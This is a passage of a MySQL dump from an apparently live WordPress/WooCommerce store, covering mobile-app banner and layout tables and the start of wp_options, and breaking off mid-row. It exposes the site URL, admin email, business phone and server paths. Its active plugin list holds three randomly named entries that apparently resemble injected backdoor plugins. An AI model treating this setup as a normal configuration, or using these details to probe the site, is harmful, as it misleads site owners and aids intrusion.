INSERT INTO `wp_mab_mobileapp_banners` VALUES (1,5,1,NULL,0,1,'category','banner_options_1.png',NULL,'scaleAspectFill','',NULL,1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL),(2,2,2,NULL,207,0,'product','banner_options_2.png',NULL,'scaleAspectFill','Banner 3',NULL,1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL),(3,2,1,NULL,0,2,'category','banner_options_3.png',NULL,'scaleAspectFill','Banner 2',NULL,1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL),(4,2,1,NULL,0,3,'category','banner_options_4.png',NULL,'scaleAspectFill','Banner 1',NULL,1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL),(5,3,1,NULL,0,1,'category','banner_options_5.png',NULL,'scaleAspectFill','',NULL,1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL),(6,3,1,NULL,0,2,'category','banner_options_6.png',NULL,'scaleAspectFill','',NULL,1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL),(7,3,1,NULL,0,3,'category','banner_options_7.png',NULL,'scaleAspectFill','',NULL,1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL),(8,3,1,NULL,0,4,'category','banner_options_8.png',NULL,'scaleAspectFill','',NULL,1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL);
/*!40000 ALTER TABLE `wp_mab_mobileapp_banners` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_mobileapp_layout_component`
--

DROP TABLE IF EXISTS `wp_mab_mobileapp_layout_component`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_mobileapp_layout_component` (
  `id_component` int(11) NOT NULL AUTO_INCREMENT,
  `id_layout` int(11) NOT NULL,
  `id_component_type` int(11) NOT NULL,
  `position` int(11) NOT NULL,
  `component_heading` varchar(200) CHARACTER SET utf32 COLLATE utf32_general_ci DEFAULT NULL,
  `component_title` varchar(200) CHARACTER SET utf32 COLLATE utf32_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id_component`)
) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_mobileapp_layout_component`
--

LOCK TABLES `wp_mab_mobileapp_layout_component` WRITE;
/*!40000 ALTER TABLE `wp_mab_mobileapp_layout_component` DISABLE KEYS */;
INSERT INTO `wp_mab_mobileapp_layout_component` VALUES (1,1,1,1,NULL,NULL),(2,1,3,2,'Deals Of The Day',NULL),(3,1,4,3,'Last Day Sale',NULL),(4,1,1,4,NULL,NULL),(5,1,2,5,'Flat 50% Off',NULL),(6,1,8,6,'New Arrivals',NULL),(7,1,6,7,'Latest Products',NULL),(8,1,7,8,'Best Selling Products',NULL);
/*!40000 ALTER TABLE `wp_mab_mobileapp_layout_component` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_mobileapp_layouts`
--

DROP TABLE IF EXISTS `wp_mab_mobileapp_layouts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_mobileapp_layouts` (
  `id_layout` int(11) NOT NULL AUTO_INCREMENT,
  `layout_name` varchar(200) NOT NULL,
  PRIMARY KEY (`id_layout`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_mobileapp_layouts`
--

LOCK TABLES `wp_mab_mobileapp_layouts` WRITE;
/*!40000 ALTER TABLE `wp_mab_mobileapp_layouts` DISABLE KEYS */;
INSERT INTO `wp_mab_mobileapp_layouts` VALUES (1,'Default');
/*!40000 ALTER TABLE `wp_mab_mobileapp_layouts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_mobileapp_product_data`
--

DROP TABLE IF EXISTS `wp_mab_mobileapp_product_data`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_mobileapp_product_data` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `product_type` varchar(200) NOT NULL,
  `category_products` text DEFAULT NULL,
  `custom_products` text DEFAULT NULL,
  `image_content_mode` varchar(200) NOT NULL,
  `number_of_products` int(11) NOT NULL,
  `id_category` int(11) DEFAULT NULL,
  `id_component` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_mobileapp_product_data`
--

LOCK TABLES `wp_mab_mobileapp_product_data` WRITE;
/*!40000 ALTER TABLE `wp_mab_mobileapp_product_data` DISABLE KEYS */;
INSERT INTO `wp_mab_mobileapp_product_data` VALUES (7,'new_products',NULL,NULL,'scaleAspectFill',4,0,6),(8,'featured_products',NULL,NULL,'scaleAspectFill',2,0,7),(9,'new_products',NULL,NULL,'scaleAspectFill',8,0,8);
/*!40000 ALTER TABLE `wp_mab_mobileapp_product_data` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_mobileapp_tab_bar`
--

DROP TABLE IF EXISTS `wp_mab_mobileapp_tab_bar`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_mobileapp_tab_bar` (
  `tab_icon_id` int(11) NOT NULL AUTO_INCREMENT,
  `tab_icon_text` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_unicode_ci NOT NULL,
  `tab_icon_image` varchar(255) NOT NULL,
  `tab_icon_redirect_activity` varchar(80) NOT NULL,
  `tab_bar_date_added` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`tab_icon_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_mobileapp_tab_bar`
--

LOCK TABLES `wp_mab_mobileapp_tab_bar` WRITE;
/*!40000 ALTER TABLE `wp_mab_mobileapp_tab_bar` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_mab_mobileapp_tab_bar` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_mobileapp_top_category`
--

DROP TABLE IF EXISTS `wp_mab_mobileapp_top_category`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_mobileapp_top_category` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `id_component` int(11) NOT NULL,
  `id_category` varchar(200) NOT NULL,
  `image_url` longtext DEFAULT NULL,
  `image_content_mode` varchar(200) DEFAULT NULL,
  `category_heading` varchar(500) CHARACTER SET utf32 COLLATE utf32_general_ci DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_mobileapp_top_category`
--

LOCK TABLES `wp_mab_mobileapp_top_category` WRITE;
/*!40000 ALTER TABLE `wp_mab_mobileapp_top_category` DISABLE KEYS */;
INSERT INTO `wp_mab_mobileapp_top_category` VALUES (1,1,'1','top_category_1.png','scaleAspectFill','Bags'),(2,1,'2','top_category_2.png','scaleAspectFill','Dress'),(3,1,'3','top_category_3.png','scaleAspectFill','Footwear'),(4,1,'4','top_category_4.png','scaleAspectFill','Caps'),(5,1,'5','top_category_5.png','scaleAspectFill','Sunglasses'),(6,4,'1','top_category_1.png','scaleAspectFill',''),(7,4,'2','top_category_2.png','scaleAspectFill',''),(8,4,'3','top_category_3.png','scaleAspectFill',''),(9,4,'4','top_category_4.png','scaleAspectFill',''),(10,4,'5','top_category_5.png','scaleAspectFill','');
/*!40000 ALTER TABLE `wp_mab_mobileapp_top_category` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_push_notification_history`
--

DROP TABLE IF EXISTS `wp_mab_push_notification_history`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_push_notification_history` (
  `notification_id` int(10) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `message` varchar(500) DEFAULT NULL,
  `image_url` text NOT NULL,
  `redirect_activity` enum('home','category','product') NOT NULL,
  `category_id` int(10) DEFAULT NULL,
  `product_id` int(10) DEFAULT NULL,
  `date_added` datetime NOT NULL,
  PRIMARY KEY (`notification_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_push_notification_history`
--

LOCK TABLES `wp_mab_push_notification_history` WRITE;
/*!40000 ALTER TABLE `wp_mab_push_notification_history` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_mab_push_notification_history` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_unique_verification`
--

DROP TABLE IF EXISTS `wp_mab_unique_verification`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_unique_verification` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `mobile_number` varchar(15) DEFAULT NULL,
  `country_code` varchar(10) DEFAULT NULL,
  `unique_id` varchar(100) DEFAULT NULL,
  `date_added` datetime NOT NULL,
  `date_modified` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_unique_verification`
--

LOCK TABLES `wp_mab_unique_verification` WRITE;
/*!40000 ALTER TABLE `wp_mab_unique_verification` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_mab_unique_verification` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mabmobileapp_component_types`
--

DROP TABLE IF EXISTS `wp_mabmobileapp_component_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mabmobileapp_component_types` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `component_name` varchar(200) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mabmobileapp_component_types`
--

LOCK TABLES `wp_mabmobileapp_component_types` WRITE;
/*!40000 ALTER TABLE `wp_mabmobileapp_component_types` DISABLE KEYS */;
INSERT INTO `wp_mabmobileapp_component_types` VALUES (1,'Top Categories'),(2,'Banner-Square'),(3,'Banner-Horizontal Sliding'),(4,'Banner-Grid'),(5,'Banner-With Countdown Timer'),(6,'Products-Square'),(7,'Products-Horizontal Sliding'),(8,'Products-Grid'),(9,'Products-Last Accessed'),(10,'Banner-Custom');
/*!40000 ALTER TABLE `wp_mabmobileapp_component_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mobiloud_categories`
--

DROP TABLE IF EXISTS `wp_mobiloud_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mobiloud_categories` (
  `id` bigint(11) NOT NULL AUTO_INCREMENT,
  `time` bigint(11) NOT NULL DEFAULT 0,
  `cat_ID` bigint(11) NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mobiloud_categories`
--

LOCK TABLES `wp_mobiloud_categories` WRITE;
/*!40000 ALTER TABLE `wp_mobiloud_categories` DISABLE KEYS */;
INSERT INTO `wp_mobiloud_categories` VALUES (1,0,1),(2,0,19),(3,0,20);
/*!40000 ALTER TABLE `wp_mobiloud_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mobiloud_notification_categories`
--

DROP TABLE IF EXISTS `wp_mobiloud_notification_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mobiloud_notification_categories` (
  `id` bigint(11) NOT NULL AUTO_INCREMENT,
  `cat_ID` bigint(11) NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mobiloud_notification_categories`
--

LOCK TABLES `wp_mobiloud_notification_categories` WRITE;
/*!40000 ALTER TABLE `wp_mobiloud_notification_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_mobiloud_notification_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mobiloud_notifications`
--

DROP TABLE IF EXISTS `wp_mobiloud_notifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mobiloud_notifications` (
  `id` bigint(11) NOT NULL AUTO_INCREMENT,
  `time` bigint(11) NOT NULL DEFAULT 0,
  `post_id` bigint(11) DEFAULT NULL,
  `url` varchar(255) DEFAULT NULL,
  `msg` blob DEFAULT NULL,
  `android` varchar(1) NOT NULL,
  `ios` varchar(1) NOT NULL,
  `tags` blob DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mobiloud_notifications`
--

LOCK TABLES `wp_mobiloud_notifications` WRITE;
/*!40000 ALTER TABLE `wp_mobiloud_notifications` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_mobiloud_notifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mobiloud_pages`
--

DROP TABLE IF EXISTS `wp_mobiloud_pages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mobiloud_pages` (
  `id` bigint(11) NOT NULL AUTO_INCREMENT,
  `time` bigint(11) NOT NULL DEFAULT 0,
  `page_ID` bigint(11) NOT NULL,
  `ml_render` tinyint(1) NOT NULL DEFAULT 1,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mobiloud_pages`
--

LOCK TABLES `wp_mobiloud_pages` WRITE;
/*!40000 ALTER TABLE `wp_mobiloud_pages` DISABLE KEYS */;
INSERT INTO `wp_mobiloud_pages` VALUES (1,0,403,1),(2,0,8,1),(3,0,9,1),(4,0,11,1);
/*!40000 ALTER TABLE `wp_mobiloud_pages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nh_locations`
--

DROP TABLE IF EXISTS `wp_nh_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nh_locations` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL,
  `blog_id` bigint(20) unsigned NOT NULL,
  `location_slug` varchar(200) NOT NULL,
  `location_name` text NOT NULL,
  `location_owner` bigint(20) unsigned NOT NULL DEFAULT 0,
  `location_address` varchar(200) NOT NULL,
  `location_town` varchar(200) NOT NULL,
  `location_state` varchar(200) NOT NULL,
  `location_postcode` varchar(10) NOT NULL,
  `location_region` varchar(200) NOT NULL,
  `location_country` char(2) NOT NULL,
  `location_latitude` float(10,6) NOT NULL,
  `location_longitude` float(10,6) NOT NULL,
  `post_content` longtext NOT NULL,
  `location_status` int(1) NOT NULL,
  `location_private` tinyint(1) NOT NULL DEFAULT 0,
  `location_stamp` timestamp NOT NULL DEFAULT current_timestamp(),
  `location_update_stamp` datetime NOT NULL,
  `location_pintype` varchar(50) NOT NULL DEFAULT 'red',
  PRIMARY KEY (`location_id`),
  KEY `location_state` (`location_state`),
  KEY `location_region` (`location_region`),
  KEY `location_country` (`location_country`),
  KEY `post_id` (`post_id`),
  KEY `blog_id` (`blog_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nh_locations`
--

LOCK TABLES `wp_nh_locations` WRITE;
/*!40000 ALTER TABLE `wp_nh_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_nh_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=860997 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','https://s10333402.saturnwp.link','yes'),(2,'home','https://s10333402.saturnwp.link','yes'),(3,'blogname','Gopalak','yes'),(4,'blogdescription','','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','namaste@gopalak.in','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%/','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:44:{i:0;s:25:\"akygumohyz/akygumohyz.php\";i:1;s:21:\"abyposyp/abyposyp.php\";i:2;s:25:\"tablepress/tablepress.php\";i:3;s:43:\"armember-membership/armember-membership.php\";i:4;s:25:\"charitable/charitable.php\";i:5;s:48:\"chikkili-google-pay-for-woocommerce/chikkili.php\";i:6;s:31:\"code-snippets/code-snippets.php\";i:7;s:83:\"custom-shipping-methods-for-woocommerce/custom-shipping-methods-for-woocommerce.php\";i:8;s:23:\"elementor/elementor.php\";i:9;s:51:\"flexible-product-fields/flexible-product-fields.php\";i:10;s:25:\"forminator/forminator.php\";i:11;s:33:\"hunk-companion/hunk-companion.php\";i:12;s:25:\"jobboardwp/jobboardwp.php\";i:13;s:42:\"landingi-landing-pages/landingi-plugin.php\";i:14;s:86:\"login-with-mobile-number-for-woocommerce/login-with-mobile-number-for-wooocommerce.php\";i:15;s:25:\"menu-icons/menu-icons.php\";i:16;s:29:\"nginx-helper/nginx-helper.php\";i:17;s:47:\"one-click-demo-import/one-click-demo-import.php\";i:18;s:57:\"perfect-woocommerce-brands/perfect-woocommerce-brands.php\";i:19;s:62:\"razorpay-payment-button-elementor/razorpay-payment-buttons.php\";i:20;s:52:\"razorpay-payment-button/razorpay-payment-buttons.php\";i:21;s:45:\"restrict-user-access/restrict-user-access.php\";i:22;s:42:\"simple-membership/simple-wp-membership.php\";i:23;s:55:\"th-advance-product-search/th-advance-product-search.php\";i:24;s:49:\"th-all-in-one-woo-cart/th-all-in-one-woo-cart.php\";i:25;s:46:\"themehunk-megamenu-plus/themehunk-megamenu.php\";i:26;s:28:\"totalcontest-lite/plugin.php\";i:27;s:35:\"wc-cancel-order/wc-cancel-order.php\";i:28;s:43:\"wc-frontend-manager/wc_frontend_manager.php\";i:29;s:57:\"wc-multivendor-marketplace/wc-multivendor-marketplace.php\";i:30;s:55:\"wc-multivendor-membership/wc-multivendor-membership.php\";i:31;s:29:\"woo-razorpay/woo-razorpay.php\";i:32;s:50:\"woocommerce-bulk-order-form/wc-bulk-order-form.php\";i:33;s:80:\"woocommerce-pdf-invoices-packing-slips/woocommerce-pdf-invoices-packingslips.php\";i:34;s:27:\"woocommerce/woocommerce.php\";i:35;s:49:\"wp-file-download-light/wp-file-download-light.php\";i:36;s:39:\"wp-file-manager/file_folder_manager.php\";i:37;s:40:\"wp-file-upload/wordpress_file_upload.php\";i:38;s:29:\"wp-mail-smtp/wp_mail_smtp.php\";i:39;s:49:\"wp-table-manager-light/wp-table-manager-light.php\";i:40;s:24:\"wpforms-lite/wpforms.php\";i:41;s:39:\"yith-pre-order-for-woocommerce/init.php\";i:42;s:22:\"zoho-mail/zohoMail.php\";i:43;s:21:\"aduxukag/aduxukag.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','https://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:5:{i:0;s:94:\"/storage/v6964/gopalak/public_html/wp-content/plugins/wc-donation-platform/assets/css/wcdp.css\";i:1;s:84:\"/storage/v6964/gopalak/public_html/wp-content/plugins/wc-donation-platform/index.php\";i:2;s:99:\"/storage/v6964/gopalak/public_html/wp-content/plugins/wc-donation-platform/wc-donation-platform.php\";i:3;s:78:\"/storage/v6964/gopalak/public_html/wp-content/plugins/buddypress/bp-loader.php\";i:4;s:95:\"/storage/v6964/gopalak/public_html/wp-content/themes/open-shop/customizer/custom-customizer.php\";}','no'),(40,'template','open-shop','yes'),(41,'stylesheet','open-shop','yes'),(42,'comment_registration','0','yes'),(43,'html_type','text/html','yes'),(44,'use_trackback','0','yes'),(45,'default_role','customer','yes'),(46,'db_version','60717','yes'),(47,'uploads_use_yearmonth_folders','1','yes'),(48,'upload_path','','yes'),(49,'blog_public','1','yes'),(50,'default_link_category','2','yes'),(51,'show_on_front','page','yes'),(52,'tag_base','','yes'),(53,'show_avatars','1','yes'),(54,'avatar_rating','G','yes'),(55,'upload_url_path','','yes'),(56,'thumbnail_size_w','150','yes'),(57,'thumbnail_size_h','150','yes'),(58,'thumbnail_crop','1','yes'),(59,'medium_size_w','300','yes'),(60,'medium_size_h','300','yes'),(61,'avatar_default','mystery','yes'),(62,'large_size_w','1024','yes'),(63,'large_size_h','1024','yes'),(64,'image_default_link_type','none','yes'),(65,'image_default_size','','yes'),(66,'image_default_align','','yes'),(67,'close_comments_for_old_posts','0','yes'),(68,'close_comments_days_old','14','yes'),(69,'thread_comments','1','yes'),(70,'thread_comments_depth','5','yes'),(71,'page_comments','0','yes'),(72,'comments_per_page','50','yes'),(73,'default_comments_page','newest','yes'),(74,'comment_order','asc','yes'),(75,'sticky_posts','a:0:{}','yes'),(76,'widget_categories','a:4:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;i:4;a:0:{}i:6;a:4:{s:5:\"title\";s:9:\"pre order\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}}','yes'),(77,'widget_text','a:3:{i:1;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:170:\"&nbsp;\r\n\r\nDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident.\r\n\r\n&nbsp;\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:2;a:4:{s:5:\"title\";s:15:\"Contact Details\";s:4:\"text\";s:124:\"800 vivdhity ventures\r\nSecond floor, HSR Layout\r\nBangalore 560102\r\nContact : (+91)7411722844\r\nE-mail id : namaste@gopalak.in\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}s:12:\"_multiwidget\";i:1;}','yes'),(78,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(79,'uninstall_plugins','a:12:{s:23:\"elementor/elementor.php\";a:2:{i:0;s:21:\"Elementor\\Maintenance\";i:1;s:9:\"uninstall\";}s:49:\"wp-file-download-light/wp-file-download-light.php\";s:14:\"wpfd_uninstall\";s:49:\"wp-table-manager-light/wp-table-manager-light.php\";s:14:\"wptm_uninstall\";s:28:\"totalcontest-lite/plugin.php\";a:2:{i:0;s:19:\"TotalContest\\Plugin\";i:1;s:11:\"onUninstall\";}s:41:\"appmaker-wp-mobile-app-manager/plugin.php\";a:2:{i:0;s:11:\"APPMAKER_WP\";i:1;s:9:\"uninstall\";}s:17:\"appful/appful.php\";s:20:\"appful_api_uninstall\";s:41:\"booking-activities/booking-activities.php\";s:18:\"bookacti_uninstall\";s:17:\"weglot/weglot.php\";s:23:\"weglot_plugin_uninstall\";s:29:\"shared-files/shared-files.php\";a:2:{i:0;s:8:\"Freemius\";i:1;s:22:\"_uninstall_plugin_hook\";}s:43:\"armember-membership/armember-membership.php\";a:2:{i:0;s:12:\"ARMemberlite\";i:1;s:9:\"uninstall\";}s:115:\"woo-razorpay/storage/v6964/gopalak/public_html/wp-content/plugins/wp-file-download-light/wp-file-download-light.php\";s:14:\"wpfd_uninstall\";s:115:\"woo-razorpay/storage/v6964/gopalak/public_html/wp-content/plugins/wp-table-manager-light/wp-table-manager-light.php\";s:14:\"wptm_uninstall\";}','no'),(80,'timezone_string','Asia/Kolkata','yes'),(81,'page_for_posts','0','yes'),(82,'page_on_front','1373','yes'),(83,'default_post_format','0','yes'),(84,'link_manager_enabled','0','yes'),(85,'finished_splitting_shared_terms','1','yes'),(86,'site_icon','1906','yes'),(87,'medium_large_size_w','768','yes'),(88,'medium_large_size_h','0','yes'),(89,'wp_page_for_privacy_policy','0','yes'),(90,'show_comments_cookies_opt_in','1','yes'),(91,'admin_email_lifespan','1705127901','yes'),(92,'disallowed_keys','','no'),(93,'comment_previously_approved','1','yes'),(94,'auto_plugin_theme_update_emails','a:0:{}','no'),(95,'auto_update_core_dev','enabled','yes'),(96,'auto_update_core_minor','enabled','yes'),(97,'auto_update_core_major','enabled','yes'),(98,'wp_force_deactivated_plugins','a:0:{}','off'),(99,'initial_db_version','49752','yes'),(100,'wp_user_roles','a:25:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:264:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b: